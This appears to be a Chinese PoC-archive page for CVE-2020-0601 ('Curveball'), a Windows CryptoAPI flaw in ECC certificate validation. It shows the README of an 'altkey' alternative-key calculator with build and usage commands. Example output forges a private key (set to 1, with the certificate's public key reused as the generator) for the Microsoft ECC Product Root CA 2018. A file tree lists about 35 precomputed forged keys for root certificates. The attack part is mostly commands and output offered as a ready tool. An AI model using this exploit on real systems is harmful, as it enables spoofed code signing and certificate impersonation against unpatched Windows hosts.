关联漏洞
标题:Microsoft Windows CryptoAPI 信任管理问题漏洞 (CVE-2020-0601)Description:Microsoft Windows CryptoAPI是美国微软(Microsoft)公司的一个在Windows 操作系统中添加的密码编译机能。作为资料加密与解密功能的重要基础,CryptoAPI 支持同步,异步的密钥加密处理,以及操作系统中的数字证书 的管理工作。 Microsoft Windows CryptoAPI (Crypt32.dll)中验证椭圆曲线加密(ECC)证书的方法存在信任管理问题漏洞。攻击者可通过使用欺骗性的代码签名证书利用该漏洞签名恶意的可执行文件。以下产品及版本受到影响:Micr
Description
CVE-2020-0601 #curveball - Alternative Key Calculator
介绍
# curveball
CVE-2020-0601 #curveball - Alternative Key Calculator
## Build
### Windows
Visual Studio 2012 or >, then build the solution.
### Linux / Unix
`cc altkey.c -lcrypto -o altkey`
## Usage
Usage: `altkey ec_public_certificate.pem [ec_new_privatekey.pem]`
## Example
```
C:\security\curveball\Release>altkey ..\public\CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt myprivate.key
Certificate:
Data:
Serial Number:
14:98:26:66:dc:7c:cd:8f:40:53:67:7b:b9:99:ec:85
Issuer: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft ECC Product Root Certificate Authority 2018
Validity
Not Before: Feb 27 20:42:08 2018 GMT
Not After : Feb 27 20:50:46 2043 GMT
Subject: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft ECC Product Root Certificate Authority 2018
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (384 bit)
pub:
04:c7:11:16:2a:76:1d:56:8e:be:b9:62:65:d4:c3:
ce:b4:f0:c3:30:ec:8f:6d:d7:6e:39:bc:c8:49:ab:
ab:b8:e3:43:78:d5:81:06:5d:ef:c7:7d:9f:ce:d6:
b3:90:75:de:0c:b0:90:de:23:ba:c8:d1:3e:67:e0:
19:a9:1b:86:31:1e:5f:34:2d:ee:17:fd:15:fb:7e:
27:8a:32:a1:ea:c9:8f:c9:7e:18:cb:2f:3b:2c:48:
7a:7d:a6:f4:01:07:ac
ASN1 OID: secp384r1
NIST CURVE: P-384
Private-Key set to 1
Private-Key: (384 bit)
priv:
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:
00:00:01
pub:
04:c7:11:16:2a:76:1d:56:8e:be:b9:62:65:d4:c3:
ce:b4:f0:c3:30:ec:8f:6d:d7:6e:39:bc:c8:49:ab:
ab:b8:e3:43:78:d5:81:06:5d:ef:c7:7d:9f:ce:d6:
b3:90:75:de:0c:b0:90:de:23:ba:c8:d1:3e:67:e0:
19:a9:1b:86:31:1e:5f:34:2d:ee:17:fd:15:fb:7e:
27:8a:32:a1:ea:c9:8f:c9:7e:18:cb:2f:3b:2c:48:
7a:7d:a6:f4:01:07:ac
Field Type: prime-field
Prime:
00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00:
ff:ff:ff:ff
A:
00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00:
ff:ff:ff:fc
B:
00:b3:31:2f:a7:e2:3e:e7:e4:98:8e:05:6b:e3:f8:
2d:19:18:1d:9c:6e:fe:81:41:12:03:14:08:8f:50:
13:87:5a:c6:56:39:8d:8a:2e:d1:9d:2a:85:c8:ed:
d3:ec:2a:ef
Generator (uncompressed):
04:c7:11:16:2a:76:1d:56:8e:be:b9:62:65:d4:c3:
ce:b4:f0:c3:30:ec:8f:6d:d7:6e:39:bc:c8:49:ab:
ab:b8:e3:43:78:d5:81:06:5d:ef:c7:7d:9f:ce:d6:
b3:90:75:de:0c:b0:90:de:23:ba:c8:d1:3e:67:e0:
19:a9:1b:86:31:1e:5f:34:2d:ee:17:fd:15:fb:7e:
27:8a:32:a1:ea:c9:8f:c9:7e:18:cb:2f:3b:2c:48:
7a:7d:a6:f4:01:07:ac
Order:
00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:c7:63:4d:81:f4:
37:2d:df:58:1a:0d:b2:48:b0:a7:7a:ec:ec:19:6a:
cc:c5:29:73
Cofactor: 1 (0x1)
Seed:
a3:35:92:6a:a3:19:a2:7a:1d:00:89:6a:67:73:a4:
82:7a:cd:ac:73
Private-Key saved to: myprivate.key
```
文件快照
[4.0K] /data/pocs/2096803b061d76b656434b8bd364a8634210f3b3
├── [4.0K] altkey
│ ├── [3.5K] altkey.c
│ ├── [8.7K] altkey.vcxproj
│ ├── [ 12K] altkey.vcxproj.filters
│ ├── [4.0K] include
│ │ └── [4.0K] openssl
│ │ ├── [3.4K] aes.h
│ │ ├── [3.7K] applink.c
│ │ ├── [ 15K] asn1err.h
│ │ ├── [ 34K] asn1.h
│ │ ├── [ 405] asn1_mac.h
│ │ ├── [ 33K] asn1t.h
│ │ ├── [1.3K] asyncerr.h
│ │ ├── [2.4K] async.h
│ │ ├── [6.4K] bioerr.h
│ │ ├── [ 35K] bio.h
│ │ ├── [1.9K] blowfish.h
│ │ ├── [4.9K] bnerr.h
│ │ ├── [ 22K] bn.h
│ │ ├── [ 854] buffererr.h
│ │ ├── [1.6K] buffer.h
│ │ ├── [3.2K] camellia.h
│ │ ├── [1.7K] cast.h
│ │ ├── [1.1K] cmac.h
│ │ ├── [ 11K] cmserr.h
│ │ ├── [ 16K] cms.h
│ │ ├── [1.2K] comperr.h
│ │ ├── [1.3K] comp.h
│ │ ├── [1.3K] conf_api.h
│ │ ├── [3.4K] conferr.h
│ │ ├── [5.6K] conf.h
│ │ ├── [2.3K] cryptoerr.h
│ │ ├── [ 17K] crypto.h
│ │ ├── [3.5K] cterr.h
│ │ ├── [ 16K] ct.h
│ │ ├── [ 572] __DECC_INCLUDE_EPILOGUE.H
│ │ ├── [ 647] __DECC_INCLUDE_PROLOGUE.H
│ │ ├── [7.6K] des.h
│ │ ├── [4.0K] dherr.h
│ │ ├── [ 13K] dh.h
│ │ ├── [3.0K] dsaerr.h
│ │ ├── [9.6K] dsa.h
│ │ ├── [1.6K] dtls1.h
│ │ ├── [ 957] ebcdic.h
│ │ ├── [ 368] ecdh.h
│ │ ├── [ 368] ecdsa.h
│ │ ├── [ 16K] ecerr.h
│ │ ├── [ 64K] ec.h
│ │ ├── [5.4K] engineerr.h
│ │ ├── [ 35K] engine.h
│ │ ├── [9.0K] e_os2.h
│ │ ├── [ 11K] err.h
│ │ ├── [ 11K] evperr.h
│ │ ├── [ 75K] evp.h
│ │ ├── [1.6K] hmac.h
│ │ ├── [2.1K] idea.h
│ │ ├── [2.1K] kdferr.h
│ │ ├── [4.3K] kdf.h
│ │ ├── [9.2K] lhash.h
│ │ ├── [1.1K] md2.h
│ │ ├── [1.3K] md4.h
│ │ ├── [1.3K] md5.h
│ │ ├── [1.1K] mdc2.h
│ │ ├── [ 10K] modes.h
│ │ ├── [1.3K] objectserr.h
│ │ ├── [6.6K] objects.h
│ │ ├── [218K] obj_mac.h
│ │ ├── [3.4K] ocsperr.h
│ │ ├── [ 15K] ocsp.h
│ │ ├── [4.7K] opensslconf.h
│ │ ├── [4.1K] opensslv.h
│ │ ├── [6.3K] ossl_typ.h
│ │ ├── [ 428] pem2.h
│ │ ├── [5.1K] pemerr.h
│ │ ├── [ 15K] pem.h
│ │ ├── [3.7K] pkcs12err.h
│ │ ├── [9.9K] pkcs12.h
│ │ ├── [5.1K] pkcs7err.h
│ │ ├── [ 12K] pkcs7.h
│ │ ├── [4.8K] rand_drbg.h
│ │ ├── [4.5K] randerr.h
│ │ ├── [2.2K] rand.h
│ │ ├── [1.5K] rc2.h
│ │ ├── [ 861] rc4.h
│ │ ├── [2.0K] rc5.h
│ │ ├── [1.3K] ripemd.h
│ │ ├── [9.0K] rsaerr.h
│ │ ├── [ 22K] rsa.h
│ │ ├── [8.2K] safestack.h
│ │ ├── [3.5K] seed.h
│ │ ├── [3.9K] sha.h
│ │ ├── [3.9K] srp.h
│ │ ├── [1.3K] srtp.h
│ │ ├── [ 566] ssl2.h
│ │ ├── [ 15K] ssl3.h
│ │ ├── [ 46K] sslerr.h
│ │ ├── [111K] ssl.h
│ │ ├── [3.1K] stack.h
│ │ ├── [4.4K] storeerr.h
│ │ ├── [ 11K] store.h
│ │ ├── [1.3K] symhacks.h
│ │ ├── [ 72K] tls1.h
│ │ ├── [6.7K] tserr.h
│ │ ├── [ 22K] ts.h
│ │ ├── [1.7K] txt_db.h
│ │ ├── [2.7K] uierr.h
│ │ ├── [ 16K] ui.h
│ │ ├── [1.4K] whrlpool.h
│ │ ├── [6.7K] x509err.h
│ │ ├── [ 43K] x509.h
│ │ ├── [8.7K] x509v3err.h
│ │ ├── [ 34K] x509v3.h
│ │ └── [ 32K] x509_vfy.h
│ └── [4.0K] lib
│ └── [990K] libcrypto32MD.lib
├── [ 12K] curveball.sln
├── [4.0K] private
│ ├── [ 751] 02ED0EB28C14DA45165C566791700D6451D7FB56F0B2AB1D3B8EB070E56EDFF5.key
│ ├── [ 751] 15D5B8774619EA7D54CE1CA6D0B0C403E037A917F131E8A04E1E6B7A71BABCE5.key
│ ├── [ 751] 1793927A0614549789ADCE2F8F34F7F0B66D0F3AE3A3B84D21EC15DBBA4FADC7.key
│ ├── [ 751] 179FBC148A3DD00FD24EA13458CC43BFA7F59C8182D783A513F6EBEC100C8924.key
│ ├── [ 556] 18CE6CFE7BF14E60B2E347B8DFE868CB31D02EBB3ADA271569F50343B46DB3A4.key
│ ├── [ 751] 2193CFEA381211A1AEAA2DE984E630643A87160B1208118145EAFB8E1BC69958.key
│ ├── [ 751] 22A2C1F7BDED704CC1E701B5F408C310880FE956B5DE2A4A44F99C873A25A7C8.key
│ ├── [ 751] 31AD6648F8104138C738F39EA4320133393E3A18CC02296EF97C2AC9EF6731D0.key
│ ├── [ 751] 3417BB06CC6007DA1B961C920B8AB4CE3FAD820E4AA30B9ACBC4A74EBDCEBC65.key
│ ├── [ 751] 363F3C849EAB03B0A2A0F636D7B86D04D3AC7FCFE26A0A9121AB9795F6E176DF.key
│ ├── [ 751] 3FD4BE8BAAD2F26E1BDE06C7584BB720DD1A972D111F5A4999BC44B08FB4960D.key
│ ├── [ 751] 44B545AA8A25E65A73CA15DC27FC36D24C1CB9953A066539B11582DC487B4833.key
│ ├── [ 751] 4FF460D54B9C86DABFBCFC5712E0400D2BED3FBC4D4FBDAA86E06ADCD2A9AD7A.key
│ ├── [ 751] 53DFDFA4E297FCFE07594E8C62D5B8AB06B32C7549F38A163094FD6429D5DA43.key
│ ├── [ 751] 55903859C8C0C3EBB8759ECE4E2557225FF5758BBD38EBD48276601E1BD58097.key
│ ├── [ 751] 5EDB7AC43B82A06A8761E8D7BE4979EBF2611F7DD79BF91C1C6B566A219ED766.key
│ ├── [ 751] 69DDD7EA90BB57C93E135DC85EA6FCD5480B603239BDC454FC758B2A26CF7F79.key
│ ├── [ 751] 6AEA30BC02CA85AFCFEC2F65F60881893C926925FD0704BD8ADA3F0F6EDDB699.key
│ ├── [ 751] 6CC05041E6445E74696C4CFBC9F80F543B7EABBB44B4CE6F787C6A9971C42F17.key
│ ├── [ 751] 71CCA5391F9E794B04802530B363E121DA8A3043BB26662FEA4DCA7FC951A4BD.key
│ ├── [ 751] 7E37CB8B4C47090CAB36551BA6F45DB840680FBA166A952DB100717F43053FC2.key
│ ├── [ 751] 8560F91C3624DABA9570B5FEA0DBE36FF11A8323BE9486854FB3F34A5571198D.key
│ ├── [ 751] 86A1ECBA089C4A8D3BBE2734C612BA341D813E043CF9E8A862CD5C57A36BBE6B.key
│ ├── [ 751] 8B45DA1C06F791EB0CABF26BE588F5FB23165C2E614BF885562D0DCE50B29B02.key
│ ├── [ 556] 945BBC825EA554F489D1FD51A73DDF2EA624AC7019A05205225C22A78CCFA8B4.key
│ ├── [ 751] A4310D50AF18A6447190372A86AFAF8B951FFB431D837F1E5688B45971ED1557.key
│ ├── [ 751] B7C36231706E81078C367CB896198F1E3208DD926949DD8F5709A410F75B6292.key
│ ├── [ 751] BC4D809B15189D78DB3E1D8CF4F9726A795DA1643CA5F1358E1DDB0EDC0D7EB3.key
│ ├── [ 751] BD71FDF6DA97E4CF62D1647ADD2581B07D79ADF8397EB4ECBA9C5E8488821423.key
│ ├── [ 556] BEC94911C2955676DB6C0A550986D76E3BA005667C442C9762B4FBB773DE228C.key
│ ├── [ 751] CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.key
│ ├── [ 751] E35D28419ED02025CFA69038CD623962458DA5C695FBDEA3C22B0BFB25897092.key
│ ├── [ 751] E74FBDA55BD564C473A36B441AA799C8A68E077440E8288B9FA1E50E4BBACA11.key
│ ├── [ 751] FE863D0822FE7A2353FA484D5924E875656D3DC9FB58771F6F616F9D571BC592.key
│ └── [ 751] FEA1884AB3AEA6D0DBEDBE4B9CD9FEC8655116300A86A856488FC488BB4B44D2.key
├── [4.0K] public
│ ├── [1.1K] 02ED0EB28C14DA45165C566791700D6451D7FB56F0B2AB1D3B8EB070E56EDFF5.crt
│ ├── [ 769] 15D5B8774619EA7D54CE1CA6D0B0C403E037A917F131E8A04E1E6B7A71BABCE5.crt
│ ├── [ 940] 1793927A0614549789ADCE2F8F34F7F0B66D0F3AE3A3B84D21EC15DBBA4FADC7.crt
│ ├── [ 794] 179FBC148A3DD00FD24EA13458CC43BFA7F59C8182D783A513F6EBEC100C8924.crt
│ ├── [ 656] 18CE6CFE7BF14E60B2E347B8DFE868CB31D02EBB3ADA271569F50343B46DB3A4.crt
│ ├── [ 956] 2193CFEA381211A1AEAA2DE984E630643A87160B1208118145EAFB8E1BC69958.crt
│ ├── [ 956] 22A2C1F7BDED704CC1E701B5F408C310880FE956B5DE2A4A44F99C873A25A7C8.crt
│ ├── [ 839] 31AD6648F8104138C738F39EA4320133393E3A18CC02296EF97C2AC9EF6731D0.crt
│ ├── [ 944] 3417BB06CC6007DA1B961C920B8AB4CE3FAD820E4AA30B9ACBC4A74EBDCEBC65.crt
│ ├── [ 981] 363F3C849EAB03B0A2A0F636D7B86D04D3AC7FCFE26A0A9121AB9795F6E176DF.crt
│ ├── [1.1K] 3FD4BE8BAAD2F26E1BDE06C7584BB720DD1A972D111F5A4999BC44B08FB4960D.crt
│ ├── [1017] 44B545AA8A25E65A73CA15DC27FC36D24C1CB9953A066539B11582DC487B4833.crt
│ ├── [ 948] 4FF460D54B9C86DABFBCFC5712E0400D2BED3FBC4D4FBDAA86E06ADCD2A9AD7A.crt
│ ├── [ 981] 53DFDFA4E297FCFE07594E8C62D5B8AB06B32C7549F38A163094FD6429D5DA43.crt
│ ├── [ 969] 55903859C8C0C3EBB8759ECE4E2557225FF5758BBD38EBD48276601E1BD58097.crt
│ ├── [ 989] 5EDB7AC43B82A06A8761E8D7BE4979EBF2611F7DD79BF91C1C6B566A219ED766.crt
│ ├── [1.3K] 69DDD7EA90BB57C93E135DC85EA6FCD5480B603239BDC454FC758B2A26CF7F79.crt
│ ├── [1.1K] 6AEA30BC02CA85AFCFEC2F65F60881893C926925FD0704BD8ADA3F0F6EDDB699.crt
│ ├── [ 794] 6CC05041E6445E74696C4CFBC9F80F543B7EABBB44B4CE6F787C6A9971C42F17.crt
│ ├── [ 769] 71CCA5391F9E794B04802530B363E121DA8A3043BB26662FEA4DCA7FC951A4BD.crt
│ ├── [ 851] 7E37CB8B4C47090CAB36551BA6F45DB840680FBA166A952DB100717F43053FC2.crt
│ ├── [ 895] 8560F91C3624DABA9570B5FEA0DBE36FF11A8323BE9486854FB3F34A5571198D.crt
│ ├── [ 859] 86A1ECBA089C4A8D3BBE2734C612BA341D813E043CF9E8A862CD5C57A36BBE6B.crt
│ ├── [ 765] 8B45DA1C06F791EB0CABF26BE588F5FB23165C2E614BF885562D0DCE50B29B02.crt
│ ├── [ 883] 945BBC825EA554F489D1FD51A73DDF2EA624AC7019A05205225C22A78CCFA8B4.crt
│ ├── [ 940] A4310D50AF18A6447190372A86AFAF8B951FFB431D837F1E5688B45971ED1557.crt
│ ├── [ 798] B7C36231706E81078C367CB896198F1E3208DD926949DD8F5709A410F75B6292.crt
│ ├── [ 814] BC4D809B15189D78DB3E1D8CF4F9726A795DA1643CA5F1358E1DDB0EDC0D7EB3.crt
│ ├── [ 753] BD71FDF6DA97E4CF62D1647ADD2581B07D79ADF8397EB4ECBA9C5E8488821423.crt
│ ├── [ 713] BEC94911C2955676DB6C0A550986D76E3BA005667C442C9762B4FBB773DE228C.crt
│ ├── [1.1K] CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt
│ ├── [ 737] E35D28419ED02025CFA69038CD623962458DA5C695FBDEA3C22B0BFB25897092.crt
│ ├── [ 830] E74FBDA55BD564C473A36B441AA799C8A68E077440E8288B9FA1E50E4BBACA11.crt
│ ├── [ 981] FE863D0822FE7A2353FA484D5924E875656D3DC9FB58771F6F616F9D571BC592.crt
│ └── [1.1K] FEA1884AB3AEA6D0DBEDBE4B9CD9FEC8655116300A86A856488FC488BB4B44D2.crt
└── [3.3K] README.md
6 directories, 183 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。